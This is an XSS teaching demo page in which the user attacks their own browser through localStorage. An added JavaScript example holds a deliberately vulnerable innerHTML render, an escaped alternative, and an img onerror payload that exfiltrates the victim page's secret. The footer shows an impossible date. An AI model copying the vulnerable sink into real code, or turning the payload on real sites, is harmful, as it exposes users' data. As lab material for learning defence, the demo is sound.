Cross-site scripting (XSS) Demo App


This demo illustrates, hands-on, what XSS is and how it works. Since we don't want anything bad to happen, you can only attack yourself: messages are exchanged via local storage, so both sides run in your own browser. You will need two tabs open, one for the victim and one for the attacker.

The "Victim" does not require any input from you. It accepts messages (via local storage) from the attacker and executes any payloads they contain. You just need to keep the page open so messages have somewhere to go.

As the "Attacker", your mission is to obtain the secret key from the victim using XSS.
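The following is an added example, not the demo's own source, that models the two halves described above: the victim tab reads attacker-supplied text out of local storage and renders it, and the attacker tab plants a payload there and reads the secret back. The storage key names ('attacker_message', 'victim_response') and the element wiring are assumptions; the demo's real keys may differ, which is why the victim page invites you to read its source.

```javascript
// Added example (not the demo's code). Storage key names are assumed.

// Minimal escaper for the safe render path: neutralises the five characters
// that can break out of a text node or a double-quoted attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable victim render: attacker text is spliced straight into markup.
// This is the kind of sink the demo wants you to find.
function renderMessageVulnerable(message) {
  return `<div class="msg">${message}</div>`;
}

// Hardened render: same layout, but the message can only ever be text.
function renderMessageSafe(message) {
  return `<div class="msg">${escapeHtml(message)}</div>`;
}

// What the attacker would send. A <script> tag inserted via innerHTML does NOT
// execute, but event-handler attributes do: the <img> never loads, onerror
// fires, and everything readable in the victim tab (secret included) is
// written to the storage key the attacker tab watches ('victim_response' is an
// assumed name).
const EXFIL_PAYLOAD =
  '<img src="x" onerror="localStorage.setItem(\'victim_response\', document.body.textContent)">';

// Attacker side: pull the secret out of the exfiltrated body text, which will
// contain the line "Your secret is: <value>." among everything else on the page.
function extractSecret(bodyText) {
  const m = /Your secret is:\s*(.+?)\.(?:\s|$)/.exec(bodyText);
  return m ? m[1] : null;
}

// Browser-only wiring for the victim tab: the 'storage' event fires in every
// OTHER tab of the same origin when a key changes, so a write from the
// attacker tab arrives here. Not called when this file runs under Node.
function wireVictim(outputEl, { safe }) {
  window.addEventListener('storage', (ev) => {
    if (ev.key !== 'attacker_message' || ev.newValue === null) return;
    outputEl.innerHTML = safe
      ? renderMessageSafe(ev.newValue)
      : renderMessageVulnerable(ev.newValue);
  });
}

// Constructed sample of what the payload would exfiltrate from the victim tab.
const SAMPLE_EXFIL_TEXT =
  'XSS Chat (Victim)\nYour secret is: s3cr3t-demo-key.\nYou shouldn\'t have to touch anything on this page.';
```

Usage in the browser: the victim tab calls `wireVictim(document.getElementById('messages'), { safe: false })`; the attacker tab runs `localStorage.setItem('attacker_message', EXFIL_PAYLOAD)` and then reads `localStorage.getItem('victim_response')`. Switching `safe` to `true` keeps the same markup but the payload renders as visible text and nothing executes.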


XSS Chat (Victim)

Your secret is: {{secret}}.

You shouldn't have to touch anything on this page. You are welcome to look at the source to see how you can best attack this "victim". Other than that, all actions should be done from the attacker's side.

Message from attacker

Send Message

XSS Chat (Attacker)

Responses

Shows all messages sent from the victim.

Send Message


Last updated: 2020/13/01
License: Creative Commons Attribution 4.0 International License.